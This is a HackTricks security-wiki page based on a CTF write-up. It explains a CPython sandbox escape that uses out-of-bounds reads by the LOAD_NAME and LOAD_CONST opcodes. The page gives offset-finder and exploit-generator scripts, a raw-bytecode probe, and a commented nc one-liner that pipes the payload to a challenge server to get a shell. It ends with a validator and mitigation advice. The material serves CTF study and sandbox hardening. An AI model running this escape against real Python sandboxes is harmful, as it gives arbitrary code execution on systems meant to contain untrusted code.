LOAD_NAME / LOAD_CONST opcode OOB Read
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
This info was taken from this writeup.
TL;DR
We can use OOB read feature in LOAD_NAME / LOAD_CONST opcode to get some symbol in the memory. Which means using trick like (a, b, c, ... hundreds of symbol ..., __getattribute__) if [] else [].__getattribute__(...)
to get a symbol (such as function name) you want.
Then just craft your exploit.
Overview
The source code is pretty short, only contains 4 lines!
source = input('>>> ')
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))1234
You can input arbitrary Python code, and it'll be compiled to a Python code object. However co_consts
and co_names
of that code object will be replaced with an empty tuple before eval that code object.
So in this way, all the expression contains consts (e.g. numbers, strings etc.) or names (e.g. variables, functions) might cause segmentation fault in the end.
Out of Bound Read
How does the segfault happen?
Let's start with a simple example, [a, b, c]
could compile into the following bytecode.
1 0 LOAD_NAME 0 (a)
2 LOAD_NAME 1 (b)
4 LOAD_NAME 2 (c)
6 BUILD_LIST 3
8 RETURN_VALUE12345
But what if the co_names
become empty tuple? The LOAD_NAME 2
opcode is still executed, and try to read value from that memory address it originally should be. Yes, this is an out-of-bound read "feature".
The core concept for the solution is simple. Some opcodes in CPython for example LOAD_NAME
and LOAD_CONST
are vulnerable (?) to OOB read.
They retrieve an object from index oparg
from the consts
or names
tuple (that's what co_consts
and co_names
named under the hood). We can refer to the following short snippest about LOAD_CONST
to see what CPython does when it proccesses to LOAD_CONST
opcode.
case TARGET(LOAD_CONST): {
PREDICTED(LOAD_CONST);
PyObject *value = GETITEM(consts, oparg);
Py_INCREF(value);
PUSH(value);
FAST_DISPATCH();
}1234567
In this way we can use the OOB feature to get a "name" from arbitrary memory offset. To make sure what name it has and what's it's offset, just keep trying LOAD_NAME 0
, LOAD_NAME 1
... LOAD_NAME 99
... And you could find something in about oparg > 700. You can also try to use gdb to take a look at the memory layout of course, but I don't think it would be more easier?
Generating the Exploit
Once we retrieve those useful offsets for names / consts, how do we get a name / const from that offset and use it? Here is a trick for you:
Let's assume we can get a __getattribute__
name from offset 5 (LOAD_NAME 5
) with co_names=()
, then just do the following stuff:
[a,b,c,d,e,__getattribute__] if [] else [
[].__getattribute__
# you can get the __getattribute__ method of list object now!
]1234
Notice that it is not necessary to name it as
__getattribute__
, you can name it as something shorter or more weird
You can understand the reason behind by just viewing it's bytecode:
0 BUILD_LIST 0
2 POP_JUMP_IF_FALSE 20
>> 4 LOAD_NAME 0 (a)
>> 6 LOAD_NAME 1 (b)
>> 8 LOAD_NAME 2 (c)
>> 10 LOAD_NAME 3 (d)
>> 12 LOAD_NAME 4 (e)
>> 14 LOAD_NAME 5 (__getattribute__)
16 BUILD_LIST 6
18 RETURN_VALUE
20 BUILD_LIST 0
>> 22 LOAD_ATTR 5 (__getattribute__)
24 BUILD_LIST 1
26 RETURN_VALUE1234567891011121314
Notice that LOAD_ATTR
also retrieve the name from co_names
. Python loads names from the same offset if the name is the same, so the second __getattribute__
is still loaded from offset=5. Using this feature we can use arbitrary name once the name is in the memory nearby.
For generating numbers should be trivial:
- 0: not [[]]
- 1: not []
- 2: (not []) + (not [])
- ...
Exploit Script
I didn't use consts due to the length limit.
First here is a script for us to find those offsets of names.
from types import CodeType
from opcode import opmap
from sys import argv
class MockBuiltins(dict):
def __getitem__(self, k):
if type(k) == str:
return k
if __name__ == '__main__':
n = int(argv[1])
code = [
*([opmap['EXTENDED_ARG'], n // 256]
if n // 256 != 0 else []),
opmap['LOAD_NAME'], n % 256,
opmap['RETURN_VALUE'], 0
]
c = CodeType(
0, 0, 0, 0, 0, 0,
bytes(code),
(), (), (), '<sandbox>', '<eval>', 0, b'', ()
)
ret = eval(c, {'__builtins__': MockBuiltins()})
if ret:
print(f'{n}: {ret}')
# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
And the following is for generating the real Python exploit.
import sys
import unicodedata
class Generator:
# get numner
def __call__(self, num):
if num == 0:
return '(not[[]])'
return '(' + ('(not[])+' * num)[:-1] + ')'
# get string
def __getattribute__(self, name):
try:
offset = None.__dir__().index(name)
return f'keys[{self(offset)}]'
except ValueError:
offset = None.__class__.__dir__(None.__class__).index(name)
return f'keys2[{self(offset)}]'
_ = Generator()
names = []
chr_code = 0
for x in range(4700):
while True:
chr_code += 1
char = unicodedata.normalize('NFKC', chr(chr_code))
if char.isidentifier() and char not in names:
names.append(char)
break
offsets = {
"__delitem__": 2800,
"__getattribute__": 2850,
'__dir__': 4693,
'__repr__': 2128,
}
variables = ('keys', 'keys2', 'None_', 'NoneType',
'm_repr', 'globals', 'builtins',)
for name, offset in offsets.items():
names[offset] = name
for i, var in enumerate(variables):
assert var not in offsets
names[792 + i] = var
source = f'''[
({",".join(names)}) if [] else [],
None_ := [[]].__delitem__({_(0)}),
keys := None_.__dir__(),
NoneType := None_.__getattribute__({_.__class__}),
keys2 := NoneType.__dir__(NoneType),
get := NoneType.__getattribute__,
m_repr := get(
get(get([],{_.__class__}),{_.__base__}),
{_.__subclasses__}
)()[-{_(2)}].__repr__,
globals := get(m_repr, m_repr.__dir__()[{_(6)}]),
builtins := globals[[*globals][{_(7)}]],
builtins[[*builtins][{_(19)}]](
builtins[[*builtins][{_(28)}]](), builtins
)
]'''.strip().replace('\n', '').replace(' ', '')
print(f"{len(source) = }", file=sys.stderr)
print(source)
# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
It basically does the following things, for those strings we get it from the __dir__
method:
getattr = (None).__getattribute__('__class__').__getattribute__
builtins = getattr(
getattr(
getattr(
[].__getattribute__('__class__'),
'__base__'),
'__subclasses__'
)()[-2],
'__repr__').__getattribute__('__globals__')['builtins']
builtins['eval'](builtins['input']())
Version notes and affected opcodes (Python 3.11–3.13)
- CPython bytecode opcodes still index into
co_consts
andco_names
tuples by integer operands. If an attacker can force these tuples to be empty (or smaller than the maximum index used by the bytecode), the interpreter will read out-of-bounds memory for that index, yielding an arbitrary PyObject pointer from nearby memory. Relevant opcodes include at least:LOAD_CONST consti
→ readsco_consts[consti]
.LOAD_NAME namei
,STORE_NAME
,DELETE_NAME
,LOAD_GLOBAL
,STORE_GLOBAL
,IMPORT_NAME
,IMPORT_FROM
,LOAD_ATTR
,STORE_ATTR
→ read names fromco_names[...]
(for 3.11+ noteLOAD_ATTR
/LOAD_GLOBAL
store flag bits in the low bit; the actual index isnamei >> 1
). See the disassembler docs for exact semantics per version. [Python dis docs].
- Python 3.11+ introduced adaptive/inline caches that add hidden
CACHE
entries between instructions. This doesn’t change the OOB primitive; it only means that if you handcraft bytecode, you must account for those cache entries when buildingco_code
.
Practical implication: the technique in this page continues to work on CPython 3.11, 3.12 and 3.13 when you can control a code object (e.g., via CodeType.replace(...)
) and shrink co_consts
/co_names
.
Quick scanner for useful OOB indexes (3.11+/3.12+ compatible)
If you prefer to probe for interesting objects directly from bytecode rather than from high-level source, you can generate minimal code objects and brute force indices. The helper below automatically inserts inline caches when needed.
import dis, types
def assemble(ops):
# ops: list of (opname, arg) pairs
cache = bytes([dis.opmap.get("CACHE", 0), 0])
out = bytearray()
for op, arg in ops:
opc = dis.opmap[op]
out += bytes([opc, arg])
# Python >=3.11 inserts per-opcode inline cache entries
ncache = getattr(dis, "_inline_cache_entries", {}).get(opc, 0)
out += cache * ncache
return bytes(out)
# Reuse an existing function's code layout to simplify CodeType construction
base = (lambda: None).__code__
# Example: probe co_consts[i] with LOAD_CONST i and return it
# co_consts/co_names are intentionally empty so LOAD_* goes OOB
def probe_const(i):
code = assemble([
("RESUME", 0), # 3.11+
("LOAD_CONST", i),
("RETURN_VALUE", 0),
])
c = base.replace(co_code=code, co_consts=(), co_names=())
try:
return eval(c)
except Exception:
return None
for idx in range(0, 300):
obj = probe_const(idx)
if obj is not None:
print(idx, type(obj), repr(obj)[:80])
Notes
- To probe names instead, swap
LOAD_CONST
forLOAD_NAME
/LOAD_GLOBAL
/LOAD_ATTR
and adjust your stack usage accordingly. - Use
EXTENDED_ARG
or multiple bytes ofarg
to reach indexes >255 if needed. When building withdis
as above, you only control the low byte; for larger indexes, construct the raw bytes yourself or split the attack across multiple loads.
Minimal bytecode-only RCE pattern (co_consts OOB → builtins → eval/input)
Once you have identified a co_consts
index that resolves to the builtins module, you can reconstruct eval(input())
without any co_names
by manipulating the stack:
# Build co_code that:
# 1) LOAD_CONST <builtins_idx> → push builtins module
# 2) Use stack shuffles and BUILD_TUPLE/UNPACK_EX to peel strings like 'input'/'eval'
# out of objects living nearby in memory (e.g., from method tables),
# 3) BINARY_SUBSCR to do builtins["input"] / builtins["eval"], CALL each, and RETURN_VALUE
# This pattern is the same idea as the high-level exploit above, but expressed in raw bytecode.
This approach is useful in challenges that give you direct control over co_code
while forcing co_consts=()
and co_names=()
(e.g., BCTF 2024 “awpcode”). It avoids source-level tricks and keeps payload size small by leveraging bytecode stack ops and tuple builders.
Defensive checks and mitigations for sandboxes
If you are writing a Python “sandbox” that compiles/evaluates untrusted code or manipulates code objects, do not rely on CPython to bounds-check tuple indexes used by bytecode. Instead, validate code objects yourself before executing them.
Practical validator (rejects OOB access to co_consts/co_names)
import dis
def max_name_index(code):
max_idx = -1
for ins in dis.get_instructions(code):
if ins.opname in {"LOAD_NAME","STORE_NAME","DELETE_NAME","IMPORT_NAME",
"IMPORT_FROM","STORE_ATTR","LOAD_ATTR","LOAD_GLOBAL","DELETE_GLOBAL"}:
namei = ins.arg or 0
# 3.11+: LOAD_ATTR/LOAD_GLOBAL encode flags in the low bit
if ins.opname in {"LOAD_ATTR","LOAD_GLOBAL"}:
namei >>= 1
max_idx = max(max_idx, namei)
return max_idx
def max_const_index(code):
return max([ins.arg for ins in dis.get_instructions(code)
if ins.opname == "LOAD_CONST"] + [-1])
def validate_code_object(code: type((lambda:0).__code__)):
if max_const_index(code) >= len(code.co_consts):
raise ValueError("Bytecode refers to const index beyond co_consts length")
if max_name_index(code) >= len(code.co_names):
raise ValueError("Bytecode refers to name index beyond co_names length")
# Example use in a sandbox:
# src = input(); c = compile(src, '<sandbox>', 'exec')
# c = c.replace(co_consts=(), co_names=()) # if you really need this, validate first
# validate_code_object(c)
# eval(c, {'__builtins__': {}})
Additional mitigation ideas
- Don’t allow arbitrary
CodeType.replace(...)
on untrusted input, or add strict structural checks on the resulting code object. - Consider running untrusted code in a separate process with OS-level sandboxing (seccomp, job objects, containers) instead of relying on CPython semantics.
References
- Splitline’s HITCON CTF 2022 writeup “V O I D” (origin of this technique and high-level exploit chain): https://blog.splitline.tw/hitcon-ctf-2022/
- Python disassembler docs (indices semantics for LOAD_CONST/LOAD_NAME/etc., and 3.11+
LOAD_ATTR
/LOAD_GLOBAL
low-bit flags): https://docs.python.org/3.13/library/dis.html
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.